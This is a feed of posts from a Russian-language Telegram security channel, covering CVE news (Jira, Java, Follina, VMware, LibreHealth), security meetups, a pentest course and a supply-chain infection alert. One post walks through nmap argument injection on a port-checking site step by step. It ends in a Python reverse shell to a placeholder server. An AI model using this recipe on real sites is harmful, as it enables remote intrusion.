Уязвимости найдены в около 100 разных версиях ноутбуков Lenovo. Идентификаторы CVE-2021-3970, CVE-2021-3971, CVE-2021-3972. Теоретически, это позволяет атакующему заразить компьютер вирусом, который не удаляется даже при форматировании жесткого диска.
Подробнее:
https://support.lenovo.com/ae/en/product_security/len-73440
#lenovo #nvram #bios
@onebrick
Подробнее:
https://support.lenovo.com/ae/en/product_security/len-73440
#lenovo #nvram #bios
@onebrick
Atlassian исправили уязвимость (CVE-2022-0540) обхода авторизации в продуктах Jira с критичностью 9.9 из 10. По описанию, для эксплуатации нужны специальные настройки, но лучше не рисковать и обновиться.
Уязвимые версии:
- Jira Core Server, Software Server, and Software Data Center before 8.13.18, the 8.14.x, 8.15.x, 8.16.x, 8.17.x, 8.18.x, 8.19.x, 8.20.x before 8.20.6, and 8.21.x.
- Jira Service Management Server and Management Data Center before 4.13.18, the 4.14.x, 4.15.x, 4.16.x, 4.17.x, 4.18.x, 4.19.x, 4.20.x before 4.20.6, 4.21.x
Облачные версии Jira и Jira Service Management не подвержены.
Подробнее:
https://www.bleepingcomputer.com/news/security/atlassian-fixes-critical-jira-authentication-bypass-vulnerability/
#jira #bypass #critical
@onebrick
Уязвимые версии:
- Jira Core Server, Software Server, and Software Data Center before 8.13.18, the 8.14.x, 8.15.x, 8.16.x, 8.17.x, 8.18.x, 8.19.x, 8.20.x before 8.20.6, and 8.21.x.
- Jira Service Management Server and Management Data Center before 4.13.18, the 4.14.x, 4.15.x, 4.16.x, 4.17.x, 4.18.x, 4.19.x, 4.20.x before 4.20.6, 4.21.x
Облачные версии Jira и Jira Service Management не подвержены.
Подробнее:
https://www.bleepingcomputer.com/news/security/atlassian-fixes-critical-jira-authentication-bypass-vulnerability/
#jira #bypass #critical
@onebrick
BleepingComputer
Atlassian fixes critical Jira authentication bypass vulnerability
Atlassian has published a security advisory to alert that its Jira and Jira Service Management products are affected by a critical authentication bypass vulnerability in Seraph, the company's web application security framework.
This media is not supported in your browser
VIEW IN TELEGRAM
Появился proof-of-concept для CVE-2022-21449, 0day уязвимости в Java. Уязвимость позволяет обойти проверку SSL сертификата, и выдать любой поддельный сайт за настоящий.
Например, представьте, что ваш софт на Java использует автообновления. Если у злоумышленника получится подменить IP сервера обновлений, несмотря на поддельный SSL сертификат, софт скачает обновления. Пример подмены google.com на видео.
Ссылка на proof-of-concept:
https://github.com/khalednassar/CVE-2022-21449-TLS-PoC
#java #0day #critical #exploit
@onebrick
@onebrick
@onebrick
Например, представьте, что ваш софт на Java использует автообновления. Если у злоумышленника получится подменить IP сервера обновлений, несмотря на поддельный SSL сертификат, софт скачает обновления. Пример подмены google.com на видео.
Ссылка на proof-of-concept:
https://github.com/khalednassar/CVE-2022-21449-TLS-PoC
#java #0day #critical #exploit
@onebrick
@onebrick
@onebrick
🔥1
В open-source системе для медицинских организаций LibreHealth EHR 2.0.0 мной обнаружено несколько уязвимостей (там их должно быть еще очень много, но пока руки не доходят): одна SQL-инъекция и множественные XSS.
Были присвоены следующие идентификаторы: CVE-2022-29938, CVE-2022-29939, CVE-2022-29940.
Так как разработчики системы переходят на совершенно новую кодовую базу, для них неактуально исправлять эти уязвимости. Поэтому можно сказать, что это зиродеи.
Подробная информация по багам и по временному исправлению:
https://murat.one/?p=160
Ссылки на MITRE:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29938
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29939
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29940
#php #librehealth #opensource #0day #exploit
@onebrick
Были присвоены следующие идентификаторы: CVE-2022-29938, CVE-2022-29939, CVE-2022-29940.
Так как разработчики системы переходят на совершенно новую кодовую базу, для них неактуально исправлять эти уязвимости. Поэтому можно сказать, что это зиродеи.
Подробная информация по багам и по временному исправлению:
https://murat.one/?p=160
Ссылки на MITRE:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29938
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29939
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29940
#php #librehealth #opensource #0day #exploit
@onebrick
🔥5
Forwarded from Thatskriptkid
r0crewKZ совместно с SolveChat расскажут доклады в Алматы, в Lenore Pub, 12 мая, в 19:00
Доклады:
1. Александр Ошлаков - "Пишем код в функциональном стиле. Как и главное Зачем"
2. Евгения Цыбренко - "Гибридные Криптобиржи: взгляд изнутри"
3. Thatskriptkid - "Решаем андроид крякми с помощью IDA"
4. novitoll - "gnuradio: Eins, zwei (G), Polizei, Drei (G), vier (G), Grenadier, Fünf (G)?"
5. Sh3lldon- Патчинг bin, elf и pe файлов с гидрой
6. sysadmin "Аваренесс о неявных превентивных сервисах"
Бесплатно, без стрима, без записи.
В конце мая доклады расскажем в Астане
Доклады:
1. Александр Ошлаков - "Пишем код в функциональном стиле. Как и главное Зачем"
2. Евгения Цыбренко - "Гибридные Криптобиржи: взгляд изнутри"
3. Thatskriptkid - "Решаем андроид крякми с помощью IDA"
4. novitoll - "gnuradio: Eins, zwei (G), Polizei, Drei (G), vier (G), Grenadier, Fünf (G)?"
5. Sh3lldon- Патчинг bin, elf и pe файлов с гидрой
6. sysadmin "Аваренесс о неявных превентивных сервисах"
Бесплатно, без стрима, без записи.
В конце мая доклады расскажем в Астане
👍2
Forwarded from Positive Events
Media is too big
VIEW IN TELEGRAM
🏆 Кибербитва The Standoff подошла к концу, а вот и лучшие красные команды.
🥇 На 1-м месте команда Codeby — у них 27 715 баллов.
🥈 На 2-м — команда True0xA3 с 23 381 баллом.
🥉 На 3-м — команда Invuls, 12 352 балла.
🎉 Поздравляем победителей и благодарим всех участников, это было здорово!
🥇 На 1-м месте команда Codeby — у них 27 715 баллов.
🥈 На 2-м — команда True0xA3 с 23 381 баллом.
🥉 На 3-м — команда Invuls, 12 352 балла.
🎉 Поздравляем победителей и благодарим всех участников, это было здорово!
🔥2
Forwarded from Thatskriptkid
Media is too big
VIEW IN TELEGRAM
r0crewKZ ⚔️ 2600
27 мая, в Астане, в BurgerShop, в 18:00 будут доклады!
1. SCAM STORIES 🌀 Morty
2. Трюки обхода AV-движков в разработке малварей. Примеры шифрования шеллкода 🌀 catv
3. 2G GSM, 4G LTE, 5G NR 🌀 novitoll
4. Attacking software developers 🌀 Thatskriptkid
Бесплатно, без записи, без стрима
27 мая, в Астане, в BurgerShop, в 18:00 будут доклады!
1. SCAM STORIES 🌀 Morty
2. Трюки обхода AV-движков в разработке малварей. Примеры шифрования шеллкода 🌀 catv
3. 2G GSM, 4G LTE, 5G NR 🌀 novitoll
4. Attacking software developers 🌀 Thatskriptkid
Бесплатно, без записи, без стрима
Forwarded from SecAtor
День Х настал, и не говорите, что не предупреждали.
Исследователи Horizon3 сегодня опубликовали эксплойт (PoC) и технический анализ критической уязвимости CVE-2022-22972 для обхода аутентификации в vRealize Automation и получения прав администратора в продуктах VMware.
Как вы помните, большинство атак АРТ в 2021 году были связаны отнюдь не с уникальными 0-day, а основывались на эксплуатации общеизвестного набора уязвимостей, который пополнился достаточно простой в эксплуатации и эффективной CVE-2022-22972.
Похоже, что следующие посты по инцидентам с VMware будем начинать с того, что «а ведь мы предупреждали».
Исследователи Horizon3 сегодня опубликовали эксплойт (PoC) и технический анализ критической уязвимости CVE-2022-22972 для обхода аутентификации в vRealize Automation и получения прав администратора в продуктах VMware.
Как вы помните, большинство атак АРТ в 2021 году были связаны отнюдь не с уникальными 0-day, а основывались на эксплуатации общеизвестного набора уязвимостей, который пополнился достаточно простой в эксплуатации и эффективной CVE-2022-22972.
Похоже, что следующие посты по инцидентам с VMware будем начинать с того, что «а ведь мы предупреждали».
Horizon3.ai
VMware Authentication Bypass Vulnerability (CVE-2022-22972) Technical Deep Dive
Technical deep dive into VMware’s recently patched authentication bypass vulnerability allowing an attacker to login as any known local user.
👍1
Forwarded from APT
🔥 MS-MSDT Office RCE
MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters). The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).
Research:
https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e
PoC:
https://github.com/JohnHammond/msdt-follina
https://github.com/chvancooten/follina.py
Demo Follina with Cobalt Strike:
https://www.youtube.com/watch?v=oM4GHtVvv1c
For BlueTeam:
https://gist.github.com/kevthehermit/5c8d52af388989cfa0ea38feace977f2
#office #rce #msmsdt #nomacro
MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters). The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).
Research:
https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e
PoC:
https://github.com/JohnHammond/msdt-follina
https://github.com/chvancooten/follina.py
Demo Follina with Cobalt Strike:
https://www.youtube.com/watch?v=oM4GHtVvv1c
For BlueTeam:
https://gist.github.com/kevthehermit/5c8d52af388989cfa0ea38feace977f2
#office #rce #msmsdt #nomacro
🔥1
Во время стажировки в NitroTeam (@nitroteamchat), студенты нашли множественные уязвимости в LibreHealth: Broken Access Control (CVE-2022-31496), Cross-Site Scripting (CVE-2022-31492, CVE-2022-31493, CVE-2022-31494, CVE-2022-31495, CVE-2022-31497, CVE-2022-31498).
Имена наших героев: Alibek Akhmetov, Bakdaulet Zhaksylyk, Daniyar Absadykov, Amir Askarov, Gaukhar Uzakbay.
Так как их менторством занимался я, решил опубликовать статью на своем блоге:
https://murat.one/?p=169
P.S. Завтра напишу короткий гайдлайн для тех, кто хочет оформить CVE для найденной уязвимости, и опубликую на канале.
#php #librehealth #opensource #0day #exploit
@onebrick
Имена наших героев: Alibek Akhmetov, Bakdaulet Zhaksylyk, Daniyar Absadykov, Amir Askarov, Gaukhar Uzakbay.
Так как их менторством занимался я, решил опубликовать статью на своем блоге:
https://murat.one/?p=169
P.S. Завтра напишу короткий гайдлайн для тех, кто хочет оформить CVE для найденной уязвимости, и опубликую на канале.
#php #librehealth #opensource #0day #exploit
@onebrick
👍4❤2
Немного с опозданием (по определенным обстоятельствам), но, как и обещал, написал заметку про получение CVE.
https://telegra.ph/cve-publication-06-06
#research #cve #0day
@onebrick
https://telegra.ph/cve-publication-06-06
#research #cve #0day
@onebrick
Telegraph
Что такое CVE и как его зарегистрировать?
Привет, уважаемый читатель! Я Мурат из компании NitroTeam.kz. В этой мини-статье я расскажу что такое CVE, как его получить и опубликовать. Из Википедии, CVE (англ. Common Vulnerabilities and Exposures) — база данных общеизвестных уязвимостей информационной…
👍3🔥3
Долго думал, выкладывать тут или нет, и решился. Некоторое время назад преподавал студентам Astana IT University курс по этичному хакингу, а так как студентов было много, лекции были записаны в формате видео. Упор был сделан на возможность просмотра лекций для всех, т.е. не только для студентов, и планировалось, что по окончанию курса слушатели будут на уровне junior penetration tester.
Формат: 10% теория / 90% практика
Курс содержит 10 тем и связанные с ними домашние задания:
Неделя 1. Введение в коммерческий пентест. Создание рабочей среды
Неделя 2. Сбор информации. OSINT
Неделя 3. Техники социальной инженерии
Неделя 4. Безопасность web-приложений
Неделя 5. Атака на web-приложения. Автоматические инструменты
Неделя 6. Безопасность инфраструктуры. Разведка
Неделя 7. Атаки на инфраструктуру. Metasploit Framework
Неделя 8. Основы Android приложений и атаки на WiFi
Неделя 9. Платформы для обучения кибербезопасности
Неделя 10. Написание коммерческого отчета
Playlist на Youtube:
https://www.youtube.com/watch?v=oRflkcjm08U&list=PLsucn_wbSMY33VfVd1zSkwnNZQwqJminO
P.S. Так как я не диктор, возможно придется поставить скорость на 1.5 :)
@onebrick
Формат: 10% теория / 90% практика
Курс содержит 10 тем и связанные с ними домашние задания:
Неделя 1. Введение в коммерческий пентест. Создание рабочей среды
Неделя 2. Сбор информации. OSINT
Неделя 3. Техники социальной инженерии
Неделя 4. Безопасность web-приложений
Неделя 5. Атака на web-приложения. Автоматические инструменты
Неделя 6. Безопасность инфраструктуры. Разведка
Неделя 7. Атаки на инфраструктуру. Metasploit Framework
Неделя 8. Основы Android приложений и атаки на WiFi
Неделя 9. Платформы для обучения кибербезопасности
Неделя 10. Написание коммерческого отчета
Playlist на Youtube:
https://www.youtube.com/watch?v=oRflkcjm08U&list=PLsucn_wbSMY33VfVd1zSkwnNZQwqJminO
P.S. Так как я не диктор, возможно придется поставить скорость на 1.5 :)
@onebrick
YouTube
Неделя 1. Введение в коммерческий пентест. Подготовка рабочей среды
Неделя 1. Введение в коммерческий пентест. Подготовка рабочей среды
Week 1. Introduction to commercial grade penetration testing. Building workspace
Курс, записанный для Astana IT University. Состоит из следующих тем:
1. Introduction to commercial-grade…
Week 1. Introduction to commercial grade penetration testing. Building workspace
Курс, записанный для Astana IT University. Состоит из следующих тем:
1. Introduction to commercial-grade…
🔥23👍4⚡1
Forwarded from Positive Events
Codeby победили на недавнем The Standoff, а еще сняли интересный фильм о себе: как они поставили цель стать лучшими этичными хакерами — и как они ими стали. Вдохновляйтесь здесь
YouTube
Фильм о команде Codeby на The Standoff 2022
Друзья, рады представить вам документальный фильм об участии команды Codeby на мероприятии The Standoff 2022!
Вспомним, какие эмоции испытывали все мы каждый день соревнований, а также узнаем, что происходило в эти дни от лица игроков.
Спасибо за съёмки…
Вспомним, какие эмоции испытывали все мы каждый день соревнований, а также узнаем, что происходило в эти дни от лица игроков.
Спасибо за съёмки…
👍4❤2
Forwarded from b4tr_ch
Парень с Казахстана написал книгу по Malware Development. У Жасулана сейчас не простая ситуация, связанная с болезнью дочери и он через книгу собирает деньги на ее лечение.
Книга на английском языке. Возможно будет полезна и давайте поддержим парня. Электронная книга, стоимость всего 16 долларов.
У Жасулана так же есть Каспи: +77087235263 для тех кто просто хочет поддержать парня.
Книга на английском языке. Возможно будет полезна и давайте поддержим парня. Электронная книга, стоимость всего 16 долларов.
У Жасулана так же есть Каспи: +77087235263 для тех кто просто хочет поддержать парня.
Forwarded from Devious Methods
Хабр
Загадочное дело о Raspberry Pi в шкафу для сетевого оборудования
Как-то я получил от своего отца (мы вместе с ним работаем на одного клиента) сообщение с приложенной фотографией. Сообщение от отца Я попросил его отключить устройство, положить в безопасное место,...
Очень давно был интересный кейс с сайтом для системных администраторов, где можно было проверить открыт ли порт сайта. Первое, что пришло голову, это вписать в IP:
В составе nmap есть модуль http-fetch, который умеет ходить по URL и скачивать файлы. Более того, можно даже указать куда сохранить файл. Немного покурив, как работают скрипты nmap, было обнаружено, что через функцию os.execute() можно выполнять команды.
0) На своем сервере открываем порт 8888:
1) Создаем у себя на сервере файл index.php с содержимым:
4) Запускаем скачанный скрипт, вписав вместо порта:
Таким образом, иногда необязательно выходить за рамки команды, вписывая такие символы, как | & ;.
Вот такой вот зиродей😁
#case #nmap #research #rce
127.0.0.1 -hВ результате сайт вернул мануал nmap-a. Но многие символы фильтровались и выйти за переделы команды nmap-а не удалось. После этого, путем проб и ошибок, был найден интересный вектор remote code execution.
В составе nmap есть модуль http-fetch, который умеет ходить по URL и скачивать файлы. Более того, можно даже указать куда сохранить файл. Немного покурив, как работают скрипты nmap, было обнаружено, что через функцию os.execute() можно выполнять команды.
0) На своем сервере открываем порт 8888:
nc -lvp 8888Допустим IP вашего сервера 1.1.1.1
1) Создаем у себя на сервере файл index.php с содержимым:
os.execute("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"1.1.1.1\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'")
2) Запускаем встроенный сервер php:php -S 0.0.0.0:80803) На атакуемом сайте вместо IP пишем:
1.1.1.1 -script http-fetchВместо порта:
8080 -dd -script-args destination=/tmpТ.е. на бэкенде сайта команда преобразуется в что-то типа:
nmap 1.1.1.1 -script http-fetch -p 8080 -dd -script-args destination=/tmpВ результате выполнения этой команды, по пути
/tmp/1.1.1.1/8080/index.html будет лежат скрипт с первого шага.4) Запускаем скачанный скрипт, вписав вместо порта:
8080 -dd -script /tmp/1.1.1.1/8080/index.htmlи получаем бэкконнект.
Таким образом, иногда необязательно выходить за рамки команды, вписывая такие символы, как | & ;.
Вот такой вот зиродей😁
#case #nmap #research #rce
👍12🔥1
Пишут, что заразили 35к репозиториев. Вредоносный код крадет все конфиги и выполняет произвольные команды.
Рекомендую поискать в коде (включая все библиотеки, в т.ч. node_modules и т.д.) домен
Если он есть, откатывайтесь, меняйте все пароли и ключи.
Источник:
https://mobile.twitter.com/stephenlacy/status/1554697077430505473
#infected
Рекомендую поискать в коде (включая все библиотеки, в т.ч. node_modules и т.д.) домен
ovz1.j19544519.pr46m.vps.myjino.ru
Если он есть, откатывайтесь, меняйте все пароли и ключи.
Источник:
https://mobile.twitter.com/stephenlacy/status/1554697077430505473
#infected
👍6